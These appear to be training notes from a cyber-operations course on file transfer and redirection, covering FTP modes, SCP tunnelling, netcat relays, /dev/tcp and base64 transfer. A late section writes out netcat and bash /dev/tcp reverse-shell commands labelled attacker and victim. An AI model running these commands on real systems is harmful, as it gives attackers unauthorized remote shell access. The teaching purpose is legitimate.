-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – File Transfer and Redirection
-----------------------------------------------------------------------------------------------------------------------------------------
                                                         Section: Outcomes
-----------------------------------------------------------------------------------------------------------------------------------------

          | Describe Data Transfer and Exfiltration – Understand how data moves across networks and how unauthorized exfiltration occurs.  
Outcomes  | Demonstrate File Transfer – Perform file transfers using various protocols and tools.  
          | Standard Methods – Identify and apply standard file transfer techniques.  
          | FTP Modes – Distinguish between Active and Passive FTP operations.  
          | Use SCP – Securely transfer files using Secure Copy Protocol.  
          | Protocol Overview – Describe common methods for transferring data across networks.

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Common File Transfer Methods
-----------------------------------------------------------------------------------------------------------------------------------------

          | TFTP – Trivial File Transfer Protocol; lightweight, no authentication, used in simple transfers.  
Methods   | FTP – File Transfer Protocol; standard method with username/password authentication.  
          | Active FTP – Client opens a port and waits for server to connect; firewall-sensitive.  
          | Passive FTP – Server opens a port and client connects; firewall-friendly.  
          | FTPS – FTP over SSL/TLS; adds encryption to traditional FTP.  
          | SFTP – SSH File Transfer Protocol; secure and encrypted, uses SSH.  
          | SCP – Secure Copy Protocol; transfers files securely via SSH.

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – FTP File Transfer Notes
-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: FTP Protocol Overview
-----------------------------------------------------------------------------------------------------------------------------------------

          | Protocol: File Transfer Protocol (FTP)  
FTP       | RFC: 959  
          | Transport: TCP  
          | Connections:  
          |   - Control Connection: Port 21  
          |   - Data Connection: Port 20 (Active mode)  
          | Authentication:  
          |   - Supports anonymous login  
          |   - User credentials sent in clear-text  
          | Features:  
          |   - Directory services  
          |   - Binary and ASCII transfer modes  
          | Security:  
          |   - Insecure by default (no encryption)  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: FTP Active Mode – Anonymous & User Access
-----------------------------------------------------------------------------------------------------------------------------------------

          | Active Mode – Client opens a port and waits for server to connect for data transfer  
Active    | Anonymous Login Example:  
          |   bob@bob-host:~$ ftp 10.0.0.104  
          |   Connected to 10.0.0.104.  
          |   Name (10.0.0.104:bob): anonymous  
          |   Password: (no password)  
          |   230 Anonymous access granted  
          |   ftp> ls  
          |   200 PORT command successful  
          |   150 Opening ASCII mode data connection for file list  
          |   -rw-r--r--   1 ftp ftp 8323 Dec 29 17:08 flag.png  
          |   -rw-r--r--   1 ftp ftp   74 Dec 29 17:08 hint.txt  
          |   -rw-r--r--   1 ftp ftp  170 Aug 30 2021 welcome.msg  
          |   226 Transfer complete  
          | Authenticated User Example:  
          |   Name: james  
          |   Password: (password)  
          |   230 User james logged in  
          |   ftp> ls  
          |   200 PORT command successful  
          |   150 Opening ASCII mode data connection for file list  
          |   226 Transfer complete  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: FTP Passive Mode – Anonymous & User Access
-----------------------------------------------------------------------------------------------------------------------------------------

          | Passive Mode – Server opens a port and client connects for data transfer  
Passive   | Anonymous Login with ProxyChains:  
          |   student@blue-internet-host:~$ proxychains ftp 10.0.0.104  
          |   Name: anonymous  
          |   Password: (no password)  
          |   ftp> passive  
          |   Passive mode on.  
          |   ftp> ls  
          |   227 Entering Passive Mode (10,0,0,104,162,147)  
          |   -rw-r--r--   1 ftp ftp 8323 Dec 29 17:08 flag.png  
          |   -rw-r--r--   1 ftp ftp   74 Dec 29 17:08 hint.txt  
          |   -rw-r--r--   1 ftp ftp  170 Aug 30 2021 welcome.msg  
          |   226 Transfer complete  
          | Authenticated User with ProxyChains:  
          |   Name: james  
          |   Password: (password)  
          |   ftp> passive  
          |   Passive mode on.  
          |   ftp> ls  
          |   227 Entering Passive Mode (10,0,0,104,168,167)  
          |   150 Opening ASCII mode data connection for file list  
          |   226 Transfer complete  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: FTP Passive Mode – Automated Retrieval with Wget
-----------------------------------------------------------------------------------------------------------------------------------------

          | Tool: Wget with ProxyChains  
Wget      | Command: proxychains wget -r ftp://10.0.0.104  
          | Behavior:  
          |   - Connects to FTP server via port 21  
          |   - Logs in as anonymous  
          |   - Switches to Passive Mode  
          |   - Recursively downloads files  
          | Result:  
          |   - 3 files downloaded successfully  
          |   - High-speed transfer observed  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – Secure File Transfer Protocols
-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: FTPS – File Transfer Protocol Secure
-----------------------------------------------------------------------------------------------------------------------------------------

          | Protocol: FTPS (FTP Secure)  
FTPS      | Security: Adds SSL/TLS encryption to standard FTP  
          | Modes:  
          |   - Explicit Mode: Uses ports 20 (data) and 21 (control)  
          |     • Client requests encryption explicitly  
          |   - Implicit Mode: Uses ports 989 (data) and 990 (control)  
          |     • Encryption is assumed from the start  
          | Terminal Access: Interactive  
          | Encryption: Optional in Explicit, mandatory in Implicit  
          | Compatibility: Extends FTP with secure layer  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SFTP – Secure File Transfer Protocol
-----------------------------------------------------------------------------------------------------------------------------------------

          | Protocol: SFTP (SSH File Transfer Protocol)  
SFTP      | Transport: TCP (Port 22)  
          | Security:  
          |   - Uses SSH for secure channel  
          |   - Employs symmetric and asymmetric encryption  
          | Authentication:  
          |   - Username/password  
          |   - SSH key-based authentication  
          | Terminal Access: Interactive  
          | Features:  
          |   - FTP-like services over SSH  
          |   - Secure file browsing, uploading, and downloading  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Comparison Summary
-----------------------------------------------------------------------------------------------------------------------------------------

          | Feature               | FTPS                                    | SFTP  
Compare   |-----------------------|-----------------------------------------|-------------------------------  
          | Encryption            | SSL/TLS                                 | SSH  
          | Ports                 | 20/21 (Explicit), 989/990 (Implicit)    | 22  
          | Authentication        | Username/password (clear-text optional) | Username/password or SSH key  
          | Terminal Access       | Yes                                     | Yes  
          | Protocol Base         | FTP                                     | SSH  
          | Security by Default   | No (Explicit mode optional)             | Yes (always encrypted)  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – SCP & SFTP File Transfer
-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP – Secure Copy Protocol
-----------------------------------------------------------------------------------------------------------------------------------------

          | Protocol: SCP (Secure Copy Protocol)  
SCP       | Transport: TCP (Port 22)  
          | Encryption: Symmetric and asymmetric via SSH  
          | Authentication: Username/password or SSH key  
          | Interaction: Non-interactive file transfer  
          | Use Case: Fast, secure file transfer over SSH  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP Command Options
-----------------------------------------------------------------------------------------------------------------------------------------

          | .   – Present working directory  
Options   | -v  – Verbose mode  
          | -P  – Specify alternate port  
          | -r  – Recursively copy entire directory  
          | -3  – 3-way copy (remote-to-remote via local)  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP Syntax Examples
-----------------------------------------------------------------------------------------------------------------------------------------

          | Download file from remote to local:  
Syntax    |   scp student@172.16.82.106:secretstuff.txt /home/student  

          | Upload file from local to remote:  
          |   scp secretstuff.txt student@172.16.82.106:/home/student  

          | Remote-to-remote copy:  
          |   scp -3 student@172.16.82.106:/home/student/secretstuff.txt student@172.16.82.112:/home/student  

          | Recursive upload of folder:  
          |   scp -r folder/ student@172.16.82.106:  

          | Recursive download of folder:  
          |   scp -r student@172.16.82.106:folder/ .  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP with Alternate SSH Port
-----------------------------------------------------------------------------------------------------------------------------------------

          | Download using alternate SSHD port:  
Alt Port  |   scp -P 1111 student@172.16.82.106:secretstuff.txt .  

          | Upload using alternate SSHD port:  
          |   scp -P 1111 secretstuff.txt student@172.16.82.106:  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP via Local Port Forwarding
-----------------------------------------------------------------------------------------------------------------------------------------

          | Create local port forward:  
Tunnel    |   ssh student@172.16.82.106 -L 1111:localhost:22 -NT  

          | Download via tunnel:  
          |   scp -P 1111 student@localhost:secretstuff.txt /home/student  

          | Upload via tunnel:  
          |   scp -P 1111 secretstuff.txt student@localhost:/home/student  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SCP via Dynamic Port Forwarding
-----------------------------------------------------------------------------------------------------------------------------------------

          | Create dynamic port forward:  
Dynamic   |   ssh student@172.16.82.106 -D 9050 -NT  

          | Download via proxychains:  
          |   proxychains scp student@localhost:secretstuff.txt .  

          | Upload via proxychains:  
          |   proxychains scp secretstuff.txt student@localhost:  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: SFTP – Secure File Transfer Protocol
-----------------------------------------------------------------------------------------------------------------------------------------

          | Protocol: SFTP (SSH File Transfer Protocol)  
SFTP      | Transport: TCP (Port 22)  
          | Encryption: Symmetric and asymmetric via SSH  
          | Authentication: Username/password or SSH key  
          | Interaction: Interactive terminal access  
          | Features: FTP-like services over secure SSH channel  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Uncommon File Transfer Methods
-----------------------------------------------------------------------------------------------------------------------------------------

          | Netcat – Transfer raw data between hosts  
Uncommon  | Netcat Relays – Redirect traffic between endpoints  
Methods   | Pipes – Use named and unnamed pipes for inter-process communication  
          | /dev/tcp – Transfer files using shell redirection to TCP sockets  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – Uncommon Methods of File Transfer
-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Overview
-----------------------------------------------------------------------------------------------------------------------------------------

          | Tool: Netcat (nc)  
Netcat    | Function: Reads/writes data across network sockets using TCP/IP  
          | Capabilities:  
          |   - Inbound/outbound TCP/UDP connections  
          |   - Troubleshooting network connectivity  
          |   - Sending/receiving data (insecurely)  
          |   - Port scanning (similar to Nmap -sT)  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Modes
-----------------------------------------------------------------------------------------------------------------------------------------

          | Server Mode:  
Modes     |   nc -lvp 1111  
          | Client Mode:  
          |   nc 10.10.0.40 1111  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat – File Transfer Examples
-----------------------------------------------------------------------------------------------------------------------------------------

          | Client to Listener (Send File):  
Transfer  |   Listener: nc -lvp 9001 > newfile.txt  
Examples  |   Client:   nc 172.16.82.106 9001 < file.txt  

          | Listener to Client (Send File):  
          |   Listener: nc -lvp 9001 < file.txt  
          |   Client:   nc 172.16.82.106 9001 > newfile.txt  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Named vs Unnamed Pipes
-----------------------------------------------------------------------------------------------------------------------------------------

          | Unnamed Pipe Example:  
Pipes     |   ip address | grep inet  

          | Named Pipe Creation:  
          |   mknod pipe p  
          |   mkfifo pipe  

          | File Descriptors:  
          |   0 = STDIN  
          |   1 = STDOUT  
          |   2 = STDERR  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Relay – Listener to Listener
-----------------------------------------------------------------------------------------------------------------------------------------

          | Relay Host (Blue_Host-1):  
Relays    |   mknod mypipe p  
Listener  |   nc -lvp 1111 < mypipe | nc -lvp 3333 > mypipe  

          | Sender (Internet_Host):  
          |   nc 172.16.82.106 1111 < secret.txt  

          | Receiver (Blue_Priv_Host-1):  
          |   nc 192.168.1.1 3333 > newsecret.txt  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Relay – Client to Client
-----------------------------------------------------------------------------------------------------------------------------------------

          | Sender (Internet_Host):  
Client    |   nc -lvp 1111 < secret.txt  

          | Receiver (Blue_Priv_Host-1):  
          |   nc -lvp 3333 > newsecret.txt  

          | Relay Host (Blue_Host-1):  
          |   mknod mypipe p  
          |   nc 10.10.0.40 1111 < mypipe | nc 192.168.1.10 3333 > mypipe  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Relay – Client to Listener
-----------------------------------------------------------------------------------------------------------------------------------------

          | Sender (Internet_Host):  
Client→L  |   nc -lvp 1111 < secret.txt  

          | Receiver (Blue_Priv_Host-1):  
          |   nc 192.168.1.1 3333 > newsecret.txt  

          | Relay Host (Blue_Host-1):  
          |   mknod mypipe p  
          |   nc 10.10.0.40 1111 < mypipe | nc -lvp 3333 > mypipe  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Netcat Relay – Listener to Client
-----------------------------------------------------------------------------------------------------------------------------------------

          | Sender (Internet_Host):  
L→Client  |   nc 172.16.82.106 1111 < secret.txt  

          | Receiver (Blue_Priv_Host-1):  
          |   nc -lvp 3333 > newsecret.txt  

          | Relay Host (Blue_Host-1):  
          |   mknod mypipe p  
          |   nc -lvp 1111 < mypipe | nc 192.168.1.10 3333 > mypipe  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: File Transfer Using /dev/tcp
-----------------------------------------------------------------------------------------------------------------------------------------

          | Send File (No Netcat Available):  
/dev/tcp  |   Receiver: nc -lvp 1111 > secret.txt  
          |   Sender:   cat secret.txt > /dev/tcp/10.10.0.40/1111  

          | Receive File (No Netcat Available):  
          |   Sender:   nc -lvp 1111 < secret.txt  
          |   Receiver: cat < /dev/tcp/10.10.0.40/1111 > secret.txt  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Reverse Shell using Netcat
-----------------------------------------------------------------------------------------------------------------------------------------
                                                  Reverse Shells
-----------------------------------------------------------------------------------------------------------------------------------------

Listener (attacker machine):
    nc -lvp 9999
    → Port `9999` can be changed to any unused port on your system.

Victim using `-c` option:
    nc -c /bin/bash IP_ADDRESS PORT
    → Replace `IP_ADDRESS` with your listener's IP (e.g., 10.10.0.40)  
    → Replace `PORT` with the same port used above (e.g., 9999)

Victim using `-e` option:
    nc -e /bin/bash IP_ADDRESS PORT
    → Same replacements as above.

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Reverse Shell using /dev/tcp
-----------------------------------------------------------------------------------------------------------------------------------------

Listener (attacker machine):
    nc -lvp 9999

Victim:
    /bin/bash -i > /dev/tcp/IP_ADDRESS/PORT 0<&1 2>&1
    → Replace `IP_ADDRESS` with your listener's IP  
    → Replace `PORT` with your listening port

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Reverse Shell using Python3
-----------------------------------------------------------------------------------------------------------------------------------------

Python3 Listener Script:
    PORT = 1234
    → You can change `1234` to any unused port

    server.bind(('', PORT))
    → Leave empty string `''` to bind to all interfaces

    # No IP changes needed unless you want to bind to a specific interface

    # This script runs on the attacker's machine and waits for incoming connections.
    # The victim would need a matching Python client to connect and send commands.

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Title: Topic – ASCII to Base64 File Transfer
-----------------------------------------------------------------------------------------------------------------------------------------
                                              ASCII to Base64 File Transfer (Simplified)
-----------------------------------------------------------------------------------------------------------------------------------------

🔹 Convert ASCII to Base64
- Example: "Test"
- Binary: T = 01010100, e = 01100101, s = 01110011, t = 01110100
- Group into 6-bit chunks → Map to Base64 table
- Result: VGVzdA==
- Add "=" padding if needed

🔹 Encode a File to Base64 (No Line Wrap)
base64 -w0 FILE_NAME
→ Example: base64 -w0 logoCyber.png

🔹 Transfer the Base64 Output
1. Create a new file: nano b64image.txt
2. Paste the Base64 output, save & exit

🔹 Decode Base64 Back to Original File
base64 -d b64image.txt > logoCyber.png

✅ Done! File transferred via Base64

-----------------------------------------------------------------------------------------------------------------
                 Base64 Encoding Table (Quick Reference)
-----------------------------------------------------------------------------------------------------------------
| Index | Binary  | Char |   | Index | Binary  | Char |   | Index | Binary  | Char |   | Index | Binary  | Char |
|-------|---------|------|---|-------|---------|------|---|-------|---------|------|---|-------|---------|------|
|   0   | 000000  |  A   |   |  16   | 010000  |  Q   |   |  32   | 100000  |  g   |   |  48   | 110000  |  w   |
|   1   | 000001  |  B   |   |  17   | 010001  |  R   |   |  33   | 100001  |  h   |   |  49   | 110001  |  x   |
|   2   | 000010  |  C   |   |  18   | 010010  |  S   |   |  34   | 100010  |  i   |   |  50   | 110010  |  y   |
|   3   | 000011  |  D   |   |  19   | 010011  |  T   |   |  35   | 100011  |  j   |   |  51   | 110011  |  z   |
|   4   | 000100  |  E   |   |  20   | 010100  |  U   |   |  36   | 100100  |  k   |   |  52   | 110100  |  0   |
|   5   | 000101  |  F   |   |  21   | 010101  |  V   |   |  37   | 100101  |  l   |   |  53   | 110101  |  1   |
|   6   | 000110  |  G   |   |  22   | 010110  |  W   |   |  38   | 100110  |  m   |   |  54   | 110110  |  2   |
|   7   | 000111  |  H   |   |  23   | 010111  |  X   |   |  39   | 100111  |  n   |   |  55   | 110111  |  3   |
|   8   | 001000  |  I   |   |  24   | 011000  |  Y   |   |  40   | 101000  |  o   |   |  56   | 111000  |  4   |
|   9   | 001001  |  J   |   |  25   | 011001  |  Z   |   |  41   | 101001  |  p   |   |  57   | 111001  |  5   |
|  10   | 001010  |  K   |   |  26   | 011010  |  a   |   |  42   | 101010  |  q   |   |  58   | 111010  |  6   |
|  11   | 001011  |  L   |   |  27   | 011011  |  b   |   |  43   | 101011  |  r   |   |  59   | 111011  |  7   |
|  12   | 001100  |  M   |   |  28   | 011100  |  c   |   |  44   | 101100  |  s   |   |  60   | 111100  |  8   |
|  13   | 001101  |  N   |   |  29   | 011101  |  d   |   |  45   | 101101  |  t   |   |  61   | 111101  |  9   |
|  14   | 001110  |  O   |   |  30   | 011110  |  e   |   |  46   | 101110  |  u   |   |  62   | 111110  |  +   |
|  15   | 001111  |  P   |   |  31   | 011111  |  f   |   |  47   | 101111  |  v   |   |  63   | 111111  |  /   |
-----------------------------------------------------------------------------------------------------------------
🔸 Padding character: "=" is used when input isn’t a multiple of 3 bytes.
-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: ASCII to Base64 Conversion
-----------------------------------------------------------------------------------------------------------------------------------------

          | Concept: Convert readable ASCII data into Base64 format  
a2b       | Use Case: Encode files for transfer over text-only channels  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Generate Base64 Output of a File
-----------------------------------------------------------------------------------------------------------------------------------------

          | Command:  
Base64    |   base64 -w0 FILE_NAME  
          | Example:  
          |   base64 -w0 logoCyber.png  
          | Notes:  
          |   - `-w0` removes line wrapping for clean output  
          |   - Replace `FILE_NAME` with the actual file you want to encode  
          |   - Copy the output for transfer  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Transfer File with Base64
-----------------------------------------------------------------------------------------------------------------------------------------

          | Step 1 – Create a new file to hold Base64 data:  
Transfer   |   nano NEW_FILE_NAME  
          | Example:  
          |   nano b64image.png  
          |   → Paste the copied Base64 output  
          |   → Save and exit  

          | Step 2 – Decode Base64 back to original file:  
          |   base64 -d NEW_FILE_NAME > ORIGINAL_FILE_NAME  
          | Example:  
          |   base64 -d b64image.png > logoCyber.png  
          | Notes:  
          |   - `NEW_FILE_NAME` is the file containing Base64 text  
          |   - `ORIGINAL_FILE_NAME` is the restored binary file  

-----------------------------------------------------------------------------------------------------------------------------------------
                                             Section: Final Steps
-----------------------------------------------------------------------------------------------------------------------------------------

          | Task: Confirm successful file transfer and redirection  
Complete   | Action: Check intel on the CTF server for updates  
          | Purpose: Validate mission progress and receive new objectives  

-----------------------------------------------------------------------------------------------------------------------------------------




































